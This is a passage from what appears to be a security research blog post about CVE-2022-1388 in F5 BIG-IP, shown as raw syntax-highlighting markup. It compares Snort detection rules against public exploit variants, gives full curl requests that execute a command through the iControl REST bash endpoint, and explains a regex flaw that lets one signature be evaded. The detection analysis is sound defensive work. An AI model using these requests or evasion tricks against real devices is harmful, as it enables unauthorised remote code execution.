pcre",[1373,101125,4606],{"class":1383},[1373,101127,183],{"class":1387},[1373,101129,101130],{"class":1391},"\u002F^Connection",[1373,101132,101133],{"class":2326},"\\x3a\\x20",[1373,101135,101136],{"class":1391},"[^",[1373,101138,15491],{"class":2326},[1373,101140,101141],{"class":1391},"]+x-F5-Auth-Token\u002FHmi",[1373,101143,183],{"class":1387},[1373,101145,101020],{"class":11735},[1373,101147,99089],{"class":1383},[1373,101149,101150,101152,101154,101156,101158,101161,101163,101165],{"class":1375,"line":4768},[1373,101151,51846],{"class":11735},[1373,101153,4606],{"class":1383},[1373,101155,16090],{"class":11735},[1373,101157,183],{"class":1387},[1373,101159,101160],{"class":1391},"Referer|3a 
20|",[1373,101162,183],{"class":1387},[1373,101164,101098],{"class":11735},[1373,101166,99089],{"class":1383},[1373,101168,101169,101171,101173,101175,101178,101180,101183],{"class":1375,"line":4792},[1373,101170,51846],{"class":11735},[1373,101172,4606],{"class":1383},[1373,101174,183],{"class":1387},[1373,101176,101177],{"class":1391},"X-F5-Auth-Token|3a 20|",[1373,101179,183],{"class":1387},[1373,101181,101182],{"class":11735},"; fast_pattern; http_header; ",[1373,101184,99089],{"class":1383},[1373,101186,101187,101190,101192,101195,101197,101200,101202,101205,101208,101210,101212,101214],{"class":1375,"line":4798},[1373,101188,101189],{"class":11735}," classtype",[1373,101191,4606],{"class":1383},[1373,101193,101194],{"class":11735},"trojan",[1373,101196,61062],{"class":1397},[1373,101198,101199],{"class":11735},"activity; sid",[1373,101201,4606],{"class":1383},[1373,101203,101204],{"class":5467},"2036556",[1373,101206,101207],{"class":11735},"; rev",[1373,101209,4606],{"class":1383},[1373,101211,353],{"class":5467},[1373,101213,39663],{"class":11735},[1373,101215,11875],{"class":1383},[18,101217,101218],{},"Snort 2.9 Community Signature ID 57336 (commented out by default):",[1354,101220,101222],{"className":100977,"code":101221,"language":100979,"meta":219,"style":219},"alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:\"POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt\"; \\\n flow:to_server,established;\n content:\"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash\"; fast_pattern:only; http_uri;\n content:\"command\"; nocase; http_client_body;\n classtype:policy-violation; sid:57336; 
rev:3;)\n",[886,101223,101224,101262,101276,101296,101311],{"__ignoreMap":219},[1373,101225,101226,101228,101230,101233,101235,101237,101239,101241,101243,101245,101247,101249,101251,101253,101256,101258,101260],{"class":1375,"line":1376},[1373,101227,100986],{"class":4640},[1373,101229,4644],{"class":28571},[1373,101231,101232],{"class":2326},"EXTERNAL_NET",[1373,101234,99071],{"class":1379},[1373,101236,100993],{"class":28571},[1373,101238,4656],{"class":28571},[1373,101240,100998],{"class":2326},[1373,101242,4656],{"class":28571},[1373,101244,101003],{"class":11735},[1373,101246,1384],{"class":1383},[1373,101248,101008],{"class":11735},[1373,101250,4606],{"class":1383},[1373,101252,183],{"class":1387},[1373,101254,101255],{"class":1391},"POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt",[1373,101257,183],{"class":1387},[1373,101259,101020],{"class":11735},[1373,101261,99089],{"class":1383},[1373,101263,101264,101266,101268,101271,101273],{"class":1375,"line":220},[1373,101265,101027],{"class":11735},[1373,101267,4606],{"class":1383},[1373,101269,101270],{"class":11735},"to_server",[1373,101272,5437],{"class":1383},[1373,101274,101275],{"class":11735},"established;\n",[1373,101277,101278,101280,101282,101284,101286,101288,101291,101293],{"class":1375,"line":1266},[1373,101279,51846],{"class":11735},[1373,101281,4606],{"class":1383},[1373,101283,183],{"class":1387},[1373,101285,100862],{"class":1391},[1373,101287,183],{"class":1387},[1373,101289,101290],{"class":11735},"; fast_pattern",[1373,101292,4606],{"class":1383},[1373,101294,101295],{"class":11735},"only; http_uri;\n",[1373,101297,101298,101300,101302,101304,101306,101308],{"class":1375,"line":1852},[1373,101299,51846],{"class":11735},[1373,101301,4606],{"class":1383},[1373,101303,183],{"class":1387},[1373,101305,16758],{"class":1391},[1373,101307,183],{"class":1387},[1373,101309,101310],{"class":11735},"; nocase; 
http_client_body;\n",[1373,101312,101313,101315,101317,101319,101321,101324,101326,101329,101331,101333,101335,101337],{"class":1375,"line":4692},[1373,101314,101189],{"class":11735},[1373,101316,4606],{"class":1383},[1373,101318,14797],{"class":11735},[1373,101320,61062],{"class":1397},[1373,101322,101323],{"class":11735},"violation; sid",[1373,101325,4606],{"class":1383},[1373,101327,101328],{"class":5467},"57336",[1373,101330,101207],{"class":11735},[1373,101332,4606],{"class":1383},[1373,101334,491],{"class":5467},[1373,101336,39663],{"class":11735},[1373,101338,11875],{"class":1383},[18,101340,101341],{},"Snort 2.9 Community Signature ID 59735:",[1354,101343,101345],{"className":100977,"code":101344,"language":100979,"meta":219,"style":219},"alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:\"SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt\"; \\\n flow:to_server,established; \\\n content:\"Connection:\"; nocase; http_header; \\\n content:\"X-F5-Auth\"; distance:0; fast_pattern; nocase; http_header; \\\n pcre:\"\u002F^Connection:[^\\r\\n]*?X-F5-Auth\u002FHim\";\n reference:cve,2022-1388; classtype:attempted-user; sid:59735; rev:2;)\n",[886,101346,101347,101384,101399,101416,101441,101461],{"__ignoreMap":219},[1373,101348,101349,101351,101353,101355,101357,101359,101361,101363,101365,101367,101369,101371,101373,101375,101378,101380,101382],{"class":1375,"line":1376},[1373,101350,100986],{"class":4640},[1373,101352,4644],{"class":28571},[1373,101354,101232],{"class":2326},[1373,101356,99071],{"class":1379},[1373,101358,100993],{"class":28571},[1373,101360,4656],{"class":28571},[1373,101362,100998],{"class":2326},[1373,101364,4656],{"class":28571},[1373,101366,101003],{"class":11735},[1373,101368,1384],{"class":1383},[1373,101370,101008],{"class":11735},[1373,101372,4606],{"class":1383},[1373,101374,183],{"class":1387},[1373,101376,101377],{"class":1391},"SERVER-WEBAPP F5 BIG-IP iControl remote code execution 
attempt",[1373,101379,183],{"class":1387},[1373,101381,101020],{"class":11735},[1373,101383,99089],{"class":1383},[1373,101385,101386,101388,101390,101392,101394,101397],{"class":1375,"line":220},[1373,101387,101027],{"class":11735},[1373,101389,4606],{"class":1383},[1373,101391,101270],{"class":11735},[1373,101393,5437],{"class":1383},[1373,101395,101396],{"class":11735},"established; ",[1373,101398,99089],{"class":1383},[1373,101400,101401,101403,101405,101407,101409,101411,101414],{"class":1375,"line":1266},[1373,101402,51846],{"class":11735},[1373,101404,4606],{"class":1383},[1373,101406,183],{"class":1387},[1373,101408,100918],{"class":1391},[1373,101410,183],{"class":1387},[1373,101412,101413],{"class":11735},"; nocase; http_header; ",[1373,101415,99089],{"class":1383},[1373,101417,101418,101420,101422,101424,101427,101429,101432,101434,101436,101439],{"class":1375,"line":1852},[1373,101419,51846],{"class":11735},[1373,101421,4606],{"class":1383},[1373,101423,183],{"class":1387},[1373,101425,101426],{"class":1391},"X-F5-Auth",[1373,101428,183],{"class":1387},[1373,101430,101431],{"class":11735},"; distance",[1373,101433,4606],{"class":1383},[1373,101435,445],{"class":5467},[1373,101437,101438],{"class":11735},"; fast_pattern; nocase; http_header; ",[1373,101440,99089],{"class":1383},[1373,101442,101443,101445,101447,101449,101452,101454,101457,101459],{"class":1375,"line":4692},[1373,101444,101123],{"class":11735},[1373,101446,4606],{"class":1383},[1373,101448,183],{"class":1387},[1373,101450,101451],{"class":1391},"\u002F^Connection:[^",[1373,101453,15491],{"class":2326},[1373,101455,101456],{"class":1391},"]*?X-F5-Auth\u002FHim",[1373,101458,183],{"class":1387},[1373,101460,4912],{"class":11735},[1373,101462,101463,101466,101468,101470,101472,101474,101476,101479,101482,101484,101487,101489,101492,101494,101497,101499,101501,101503,101505],{"class":1375,"line":4724},[1373,101464,101465],{"class":11735}," 
reference",[1373,101467,4606],{"class":1383},[1373,101469,242],{"class":11735},[1373,101471,5437],{"class":1383},[1373,101473,100820],{"class":5467},[1373,101475,61062],{"class":1397},[1373,101477,101478],{"class":5467},"1388",[1373,101480,101481],{"class":11735},"; classtype",[1373,101483,4606],{"class":1383},[1373,101485,101486],{"class":11735},"attempted",[1373,101488,61062],{"class":1397},[1373,101490,101491],{"class":11735},"user; sid",[1373,101493,4606],{"class":1383},[1373,101495,101496],{"class":5467},"59735",[1373,101498,101207],{"class":11735},[1373,101500,4606],{"class":1383},[1373,101502,353],{"class":5467},[1373,101504,39663],{"class":11735},[1373,101506,11875],{"class":1383},[18,101508,101509],{},"All three Snort rules detect Horizon3.ai’s proof of concept HTTP request, so that’s a great start for all parties. Let’s see if we can find something that these signatures won’t detect.",[61,101511,101513],{"id":101512},"exploit-variants","Exploit Variants",[18,101515,101516],{},"It’s tempting to load up a Java decompiler and start looking at the F5 BIG-IP management REST API ourselves, but that’s a bit premature. This vulnerability is approaching its first birthday, and many people have already analyzed it. Many of their findings have manifested as proof of concept exploits. A good next step is collecting those exploits and exploring what types of variants already exist in public.",[18,101518,101519,101520,101525],{},"Fortunately, VulnCheck tracks exploit sources. For the purposes of this blog, let’s focus on GitHub as the source. VulnCheck has indexed more than 50 non-fork “unique” stand-alone GitHub exploits for CVE-2022-1388. 
Excluding those that ",[47,101521,101524],{"href":101522,"rel":101523},"https:\u002F\u002Fraw.githubusercontent.com\u002Fiveresk\u002Fcve-2022-1388-1veresk\u002Fmain\u002Fcve-2022-1388.sh",[51],"don’t work",", we found that CVE-2022-1388 appears to have four exploit variants on GitHub",[993,101527,101529],{"id":101528},"_1-the-horizon3ai-variant","1. The Horizon3.ai Variant",[18,101531,101532,101533,101537],{},"Horizon3.ai published an exploit on ",[47,101534,2485],{"href":101535,"rel":101536},"https:\u002F\u002Fraw.githubusercontent.com\u002Fhorizon3ai\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.py",[51]," that, depending on the attacker provided command, exactly mirrors the proof of concept HTTP request shared in their technical write-up (included above). This variant has all five of the elements suggested by Horizon3.ai:",[18,101539,101540,101541,101543,101544,101546,101547,101550],{},"HTTP POST to ",[886,101542,100862],{},"\nA Host header using ",[886,101545,48753],{},"\nAn Authorization header using Basic base64(admin:horizon3) (or the password of your choosing)\nA Connection header that only contains ",[886,101548,101549],{},"X-F5-Auth-Token","\nAn X-F5-Auth-Token header that can contain any value.",[18,101552,101553,101554,101556],{},"This is easily reproduced using the following ",[886,101555,1557],{}," request:",[1354,101558,101560],{"className":31740,"code":101559,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H \"Host: 127.0.0.1\" -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 127.0.0.1\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: 
Basic YWRtaW468J+mng==\n> Content-Length: 42\n",[886,101561,101562,101627,101637,101644,101650,101662,101669,101676,101683,101695],{"__ignoreMap":219},[1373,101563,101564,101566,101568,101570,101572,101575,101577,101579,101581,101584,101586,101588,101590,101593,101595,101597,101599,101602,101604,101606,101608,101611,101613,101615,101617,101620,101622,101625],{"class":1375,"line":1376},[1373,101565,1557],{"class":2206},[1373,101567,82377],{"class":2209},[1373,101569,82380],{"class":2209},[1373,101571,4713],{"class":1387},[1373,101573,101574],{"class":1391},"Content-Type: application\u002Fjson",[1373,101576,1388],{"class":1387},[1373,101578,82380],{"class":2209},[1373,101580,4883],{"class":1387},[1373,101582,101583],{"class":1391},"Host: 127.0.0.1",[1373,101585,183],{"class":1387},[1373,101587,82380],{"class":2209},[1373,101589,4713],{"class":1387},[1373,101591,101592],{"class":1391},"Connection: X-F5-Auth-Token",[1373,101594,1388],{"class":1387},[1373,101596,82380],{"class":2209},[1373,101598,4713],{"class":1387},[1373,101600,101601],{"class":1391},"X-F5-Auth-Token: authtoken",[1373,101603,1388],{"class":1387},[1373,101605,82380],{"class":2209},[1373,101607,4713],{"class":1387},[1373,101609,101610],{"class":1391},"Authorization: Basic YWRtaW468J+mng==",[1373,101612,1388],{"class":1387},[1373,101614,87473],{"class":2209},[1373,101616,4713],{"class":1387},[1373,101618,101619],{"class":1391},"{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}",[1373,101621,1388],{"class":1387},[1373,101623,101624],{"class":1391}," https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash",[1373,101626,4912],{"class":1383},[1373,101628,101629,101631,101633,101635],{"class":1375,"line":220},[1373,101630,5384],{"class":1397},[1373,101632,76355],{"class":2206},[1373,101634,100878],{"class":1391},[1373,101636,35589],{"class":1391},[1373,101638,101639,101641],{"class":1375,"line":1266},[1373,101640,5384],{"class":1397},[1373,101642,101643],{"class":4640}," Host: 
127.0.0.1\n",[1373,101645,101646,101648],{"class":1375,"line":1852},[1373,101647,5384],{"class":1397},[1373,101649,35603],{"class":4640},[1373,101651,101652,101654,101656,101658,101660],{"class":1375,"line":4692},[1373,101653,5384],{"class":1397},[1373,101655,35610],{"class":4640},[1373,101657,35613],{"class":1397},[1373,101659,2180],{"class":4640},[1373,101661,35618],{"class":1397},[1373,101663,101664,101666],{"class":1375,"line":4724},[1373,101665,5384],{"class":1397},[1373,101667,101668],{"class":4640}," Content-Type: application\u002Fjson\n",[1373,101670,101671,101673],{"class":1375,"line":4756},[1373,101672,5384],{"class":1397},[1373,101674,101675],{"class":4640}," Connection: X-F5-Auth-Token\n",[1373,101677,101678,101680],{"class":1375,"line":4768},[1373,101679,5384],{"class":1397},[1373,101681,101682],{"class":4640}," X-F5-Auth-Token: authtoken\n",[1373,101684,101685,101687,101690,101692],{"class":1375,"line":4792},[1373,101686,5384],{"class":1397},[1373,101688,101689],{"class":4640}," Authorization: Basic YWRtaW468J+mng",[1373,101691,5417],{"class":1397},[1373,101693,101694],{"class":1391},"=\n",[1373,101696,101697,101699],{"class":1375,"line":4798},[1373,101698,5384],{"class":1397},[1373,101700,101701],{"class":4640}," Content-Length: 42\n",[18,101703,101704],{},"Horizon3.ai was (and is, in our eyes) the authoritative source on this vulnerability, so it’s unsurprising to see most GitHub exploits follow this pattern. However, there were a couple of notable subvariants of this approach.",[1789,101706,101707,101716],{},[25,101708,101709,101710,39227,101713,101715],{},"Exploits that used ",[886,101711,101712],{},"Host: localhost",[886,101714,101583],{},". While not actually included in this analysis, the Metasploit module for CVE-2022-1388 falls into this camp. 
Presumably, an alphanumeric Host value looks less suspicious than a loopback IP address.",[25,101717,101718,101719,1554,101722,101725,101726,101728],{},"Exploits using ",[886,101720,101721],{},"Connection: close, X-F5-Auth-Token",[886,101723,101724],{},"Connection: keep-alive, X-F5-Authtoken"," instead of just ",[886,101727,101592],{},". We’re unsure what drove this innovation, as this variation doesn’t evade any of the cited Snort rules. More than a few exploits used this approach, so we assume it’s done to satisfy a WAF requirement.",[18,101730,101731,101732,101735,101736,101740],{},"It’s interesting to note that Emerging Threats Snort 2.9 Rule 2036556 does not detect the original variation, but it will detect the ",[886,101733,101734],{},"Connection: xxxx, X-F5-Auth-Token"," sub-variant (which means it’ll catch Metasploit and ",[47,101737,22175],{"href":101738,"rel":101739},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002F5ffdd65882c35919828210c82321015be6bc439f\u002Fcves\u002F2022\u002FCVE-2022-1388.yaml#L46",[51],"). 
The error in 2036556 is a slight mistake in the following regular expression:",[1354,101742,101744],{"className":100977,"code":101743,"language":100979,"meta":219,"style":219},"pcre:\"\u002F^Connection\\x3a\\x20[^\\r\\n]+x-F5-Auth-Token\u002FHmi\"; \\\n",[886,101745,101746],{"__ignoreMap":219},[1373,101747,101748,101751,101753,101755,101757,101759,101761,101763,101765,101767,101769],{"class":1375,"line":1376},[1373,101749,101750],{"class":4640},"pcre",[1373,101752,4606],{"class":1383},[1373,101754,183],{"class":1387},[1373,101756,101130],{"class":1391},[1373,101758,101133],{"class":2326},[1373,101760,101136],{"class":1391},[1373,101762,15491],{"class":2326},[1373,101764,101141],{"class":1391},[1373,101766,183],{"class":1387},[1373,101768,101020],{"class":4640},[1373,101770,99089],{"class":1383},[18,101772,101773,101774,101777,101778,101780,101781,101783,101784,101786],{},"The character class ",[886,101775,101776],{},"[^\\r\\n]+"," must match at least one character, so it consumes the first ",[886,101779,29765],{}," when the ",[886,101782,6331],{}," header only contains ",[886,101785,101549],{},", after which the literal x-F5-Auth-Token that follows can no longer match. Snort 2.9 Community Rule 59735 uses a lazy *? that is allowed to match zero characters, so it handles this case:",[1354,101788,101790],{"className":100977,"code":101789,"language":100979,"meta":219,"style":219},"pcre:\"\u002F^Connection:[^\\r\\n]*?X-F5-Auth\u002FHim\";\n",[886,101791,101792],{"__ignoreMap":219},[1373,101793,101794,101796,101798,101800,101802,101804,101806,101808],{"class":1375,"line":1376},[1373,101795,101750],{"class":4640},[1373,101797,4606],{"class":1383},[1373,101799,183],{"class":1387},[1373,101801,101451],{"class":1391},[1373,101803,15491],{"class":2326},[1373,101805,101456],{"class":1391},[1373,101807,183],{"class":1387},[1373,101809,4912],{"class":28571},[18,101811,101812],{},"Just like that, we already have an interesting tidbit of knowledge. The signature does detect two of the biggest sources for exploitation (Metasploit and Nuclei), but now we know we can craft a payload that it doesn’t detect. 
The other two Snort rules remain problematic however, so let’s move on to the other exploit variants.",[993,101814,101816],{"id":101815},"_2-the-x-forwarded-host-variant","2. The X-Forwarded-Host Variant",[18,101818,2245,101819,10515,101822,101827,101828,1554,101830,101832,101833,101835,101836,101838],{},[886,101820,101821],{},"X-Forwarded-Host",[47,101823,101826],{"href":101824,"rel":101825},"https:\u002F\u002Fraw.githubusercontent.com\u002Fjbharucha05\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.sh",[51],"variant"," was suggested by Horizon3.ai in their technical write-up, but they didn’t use this approach in their published exploits. An exploit for CVE-2022-1388 doesn’t need to use ",[886,101829,101712],{},[886,101831,101583],{}," if the ",[886,101834,6331],{}," header contains ",[886,101837,101821],{},". Another example:",[1354,101840,101842],{"className":31740,"code":101841,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H 'Connection: X-F5-Auth-Token, X-Forwarded-Host' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 10.9.49.191\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token, X-Forwarded-Host\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 
42\n",[886,101843,101844,101895,101905,101912,101918,101930,101936,101943,101949,101959],{"__ignoreMap":219},[1373,101845,101846,101848,101850,101852,101854,101856,101858,101860,101862,101865,101867,101869,101871,101873,101875,101877,101879,101881,101883,101885,101887,101889,101891,101893],{"class":1375,"line":1376},[1373,101847,1557],{"class":2206},[1373,101849,82377],{"class":2209},[1373,101851,82380],{"class":2209},[1373,101853,4713],{"class":1387},[1373,101855,101574],{"class":1391},[1373,101857,1388],{"class":1387},[1373,101859,82380],{"class":2209},[1373,101861,4713],{"class":1387},[1373,101863,101864],{"class":1391},"Connection: X-F5-Auth-Token, X-Forwarded-Host",[1373,101866,1388],{"class":1387},[1373,101868,82380],{"class":2209},[1373,101870,4713],{"class":1387},[1373,101872,101601],{"class":1391},[1373,101874,1388],{"class":1387},[1373,101876,82380],{"class":2209},[1373,101878,4713],{"class":1387},[1373,101880,101610],{"class":1391},[1373,101882,1388],{"class":1387},[1373,101884,87473],{"class":2209},[1373,101886,4713],{"class":1387},[1373,101888,101619],{"class":1391},[1373,101890,1388],{"class":1387},[1373,101892,101624],{"class":1391},[1373,101894,4912],{"class":1383},[1373,101896,101897,101899,101901,101903],{"class":1375,"line":220},[1373,101898,5384],{"class":1397},[1373,101900,76355],{"class":2206},[1373,101902,100878],{"class":1391},[1373,101904,35589],{"class":1391},[1373,101906,101907,101909],{"class":1375,"line":1266},[1373,101908,5384],{"class":1397},[1373,101910,101911],{"class":4640}," Host: 
10.9.49.191\n",[1373,101913,101914,101916],{"class":1375,"line":1852},[1373,101915,5384],{"class":1397},[1373,101917,35603],{"class":4640},[1373,101919,101920,101922,101924,101926,101928],{"class":1375,"line":4692},[1373,101921,5384],{"class":1397},[1373,101923,35610],{"class":4640},[1373,101925,35613],{"class":1397},[1373,101927,2180],{"class":4640},[1373,101929,35618],{"class":1397},[1373,101931,101932,101934],{"class":1375,"line":4724},[1373,101933,5384],{"class":1397},[1373,101935,101668],{"class":4640},[1373,101937,101938,101940],{"class":1375,"line":4756},[1373,101939,5384],{"class":1397},[1373,101941,101942],{"class":4640}," Connection: X-F5-Auth-Token, X-Forwarded-Host\n",[1373,101944,101945,101947],{"class":1375,"line":4768},[1373,101946,5384],{"class":1397},[1373,101948,101682],{"class":4640},[1373,101950,101951,101953,101955,101957],{"class":1375,"line":4792},[1373,101952,5384],{"class":1397},[1373,101954,101689],{"class":4640},[1373,101956,5417],{"class":1397},[1373,101958,101694],{"class":1391},[1373,101960,101961,101963],{"class":1375,"line":4798},[1373,101962,5384],{"class":1397},[1373,101964,101701],{"class":4640},[18,101966,101967,101968,101970,101971,101973],{},"As suggested previously, a ",[886,101969,6301],{}," field that doesn’t match the actual target is really suspicious, so this is likely a smarter variant to use in the wild. However, none of the three Snort rules concern themselves with the ",[886,101972,6301],{}," header. Apparently, their authors also read the Horizon3.ai write-up. So, while this variant is smart, it’s not good enough. Let’s see the next variant.",[993,101975,101977],{"id":101976},"_3-the-kind-of-works-variant","3. 
The “Kind of Works” Variant",[18,101979,101980,101981,101985,101986,1554,101988,10515,101990,101992,101993,101995,101996,101998],{},"There are quite a few ",[47,101982,25091],{"href":101983,"rel":101984},"https:\u002F\u002Fraw.githubusercontent.com\u002Falt3kx\u002FCVE-2022-1388_PoC\u002Fmain\u002FREADME.md",[51]," that don’t have the required ",[886,101987,101583],{},[886,101989,101712],{},[295,101991,297],{}," they don’t use the ",[886,101994,101821],{}," value in the ",[886,101997,6331],{}," header. They effectively look like this:",[1354,102000,102002],{"className":31740,"code":102001,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 10.9.49.191\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 
42\n",[886,102003,102004,102054,102064,102070,102076,102088,102094,102100,102106,102116],{"__ignoreMap":219},[1373,102005,102006,102008,102010,102012,102014,102016,102018,102020,102022,102024,102026,102028,102030,102032,102034,102036,102038,102040,102042,102044,102046,102048,102050,102052],{"class":1375,"line":1376},[1373,102007,1557],{"class":2206},[1373,102009,82377],{"class":2209},[1373,102011,82380],{"class":2209},[1373,102013,4713],{"class":1387},[1373,102015,101574],{"class":1391},[1373,102017,1388],{"class":1387},[1373,102019,82380],{"class":2209},[1373,102021,4713],{"class":1387},[1373,102023,101592],{"class":1391},[1373,102025,1388],{"class":1387},[1373,102027,82380],{"class":2209},[1373,102029,4713],{"class":1387},[1373,102031,101601],{"class":1391},[1373,102033,1388],{"class":1387},[1373,102035,82380],{"class":2209},[1373,102037,4713],{"class":1387},[1373,102039,101610],{"class":1391},[1373,102041,1388],{"class":1387},[1373,102043,87473],{"class":2209},[1373,102045,4713],{"class":1387},[1373,102047,101619],{"class":1391},[1373,102049,1388],{"class":1387},[1373,102051,101624],{"class":1391},[1373,102053,4912],{"class":1383},[1373,102055,102056,102058,102060,102062],{"class":1375,"line":220},[1373,102057,5384],{"class":1397},[1373,102059,76355],{"class":2206},[1373,102061,100878],{"class":1391},[1373,102063,35589],{"class":1391},[1373,102065,102066,102068],{"class":1375,"line":1266},[1373,102067,5384],{"class":1397},[1373,102069,101911],{"class":4640},[1373,102071,102072,102074],{"class":1375,"line":1852},[1373,102073,5384],{"class":1397},[1373,102075,35603],{"class":4640},[1373,102077,102078,102080,102082,102084,102086],{"class":1375,"line":4692},[1373,102079,5384],{"class":1397},[1373,102081,35610],{"class":4640},[1373,102083,35613],{"class":1397},[1373,102085,2180],{"class":4640},[1373,102087,35618],{"class":1397},[1373,102089,102090,102092],{"class":1375,"line":4724},[1373,102091,5384],{"class":1397},[1373,102093,101668],{"class":4640},[1373,102095,1020
96,102098],{"class":1375,"line":4756},[1373,102097,5384],{"class":1397},[1373,102099,101675],{"class":4640},[1373,102101,102102,102104],{"class":1375,"line":4768},[1373,102103,5384],{"class":1397},[1373,102105,101682],{"class":4640},[1373,102107,102108,102110,102112,102114],{"class":1375,"line":4792},[1373,102109,5384],{"class":1397},[1373,102111,101689],{"class":4640},[1373,102113,5417],{"class":1397},[1373,102115,101694],{"class":1391},[1373,102117,102118,102120],{"class":1375,"line":4798},[1373,102119,5384],{"class":1397},[1373,102121,101701],{"class":4640},[18,102123,102124,102125,102129],{},"This variant doesn’t work on our test installation (BIG-IP version 16.1.2.1 - December 22, 2021), but many exploits on GitHub follow this pattern. Originally, we assumed these exploits were broken, but we looked deeper given their volume. We couldn’t get our hands on an older installation, but we found this ",[47,102126,94167],{"href":102127,"rel":102128},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=bLYAzyBwIV4",[51]," demonstrating this variant working on a BIG-IP version from 2019. So, these exploits work, but only on old targets. They “kind of work.”",[18,102131,102132,102133,102135],{},"This is also our first real deviation from Horizon3.ai. Pretty interesting! How and why this variant became popular is a mystery. Perhaps a misunderstanding of the importance of the ",[886,102134,6301],{}," header. But it doesn’t matter too much: none of the three Snort rules are fooled by the missing values. So we forge ahead.",[993,102137,102139],{"id":102138},"_4-referer-variant","4. Referer Variant",[18,102141,2245,102142,102147,102148,102150,102151,102156],{},[47,102143,102146],{"href":102144,"rel":102145},"https:\u002F\u002Fraw.githubusercontent.com\u002Fnumanturle\u002FCVE-2022-1388\u002Fmain\u002Fbigip-icontrol-rest-rce.yaml",[51],"Referer Variant"," is only notable because it bypasses one of the Snort signatures. 
This variant is no different than the original Horizon3.ai variant except there’s an added ",[886,102149,9024],{}," HTTP Header. Again, it’s unclear what drove this innovation, but we guess that it’s related to a WAF ",[47,102152,102155],{"href":102153,"rel":102154},"https:\u002F\u002Fportswigger.net\u002Fweb-security\u002Fcsrf\u002Fbypassing-referer-based-defenses",[51],"CSRF validation",". On the wire, this variant looks like the following:",[1354,102158,102160],{"className":31740,"code":102159,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H \"Host: localhost\" -H \"Referer: https:\u002F\u002F10.9.49.191\u002F\" -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: localhost\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Referer: https:\u002F\u002F10.9.49.191\u002F\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 
42\n",[886,102161,102162,102229,102239,102246,102252,102264,102270,102277,102283,102289,102299],{"__ignoreMap":219},[1373,102163,102164,102166,102168,102170,102172,102174,102176,102178,102180,102182,102184,102186,102188,102191,102193,102195,102197,102199,102201,102203,102205,102207,102209,102211,102213,102215,102217,102219,102221,102223,102225,102227],{"class":1375,"line":1376},[1373,102165,1557],{"class":2206},[1373,102167,82377],{"class":2209},[1373,102169,82380],{"class":2209},[1373,102171,4713],{"class":1387},[1373,102173,101574],{"class":1391},[1373,102175,1388],{"class":1387},[1373,102177,82380],{"class":2209},[1373,102179,4883],{"class":1387},[1373,102181,101712],{"class":1391},[1373,102183,183],{"class":1387},[1373,102185,82380],{"class":2209},[1373,102187,4883],{"class":1387},[1373,102189,102190],{"class":1391},"Referer: 